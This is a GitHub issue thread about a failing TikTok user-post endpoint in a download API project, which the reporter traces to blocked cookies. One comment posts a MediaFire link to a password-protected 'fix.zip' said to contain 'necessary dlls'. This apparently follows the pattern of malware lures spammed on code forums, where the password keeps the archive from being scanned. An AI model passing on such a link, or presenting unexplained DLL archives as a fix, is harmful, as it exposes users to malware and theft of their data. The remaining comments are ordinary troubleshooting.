### ISSUE TITLE
[BUG] Error api /api/tiktok/web/fetch_user_post cannot be used

### ISSUE THREAD

**Issue by nguyenduclongwin** [Evil0ctal/Douyin_TikTok_Download_API#483]
***Platform where the error occurred?***

Such as: TikTok

***The endpoint where the error occurred?***

Such as: Web

***Submitted input value?***

Such as: every link

***Have you tried again?***

Such as: Yes, the error still exists.

***Have you checked the readme or interface documentation for this project?***

Such as: Yes, and it is very sure that the problem is caused by the program.

**Comment by SagarChandra07** [comment]
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
I put the necessary dlls in the archive

**Comment by Evil0ctal** [comment]
Have you change to your own cookie in config.yaml?

**Comment by nguyenduclongwin** [comment]
> Have you change to your own cookie in config.yaml?

I always use my cookies, I also thought it was because of cookies until I tested the api on https://douyin.wtf and it also failed.

**Comment by nguyenduclongwin** [comment]
It seems that because I called the tiktok api too much, my cookies were blocked. I will close this issue

**Comment by Evil0ctal** [comment]
I see, I will try reproducing this issue at my local environment.

**Comment by Evil0ctal** [comment]
> It seems that because I called the tiktok api too much, my cookies were blocked. I will close this issue

Oh nice, then try switching to another account cookie should be fix it.
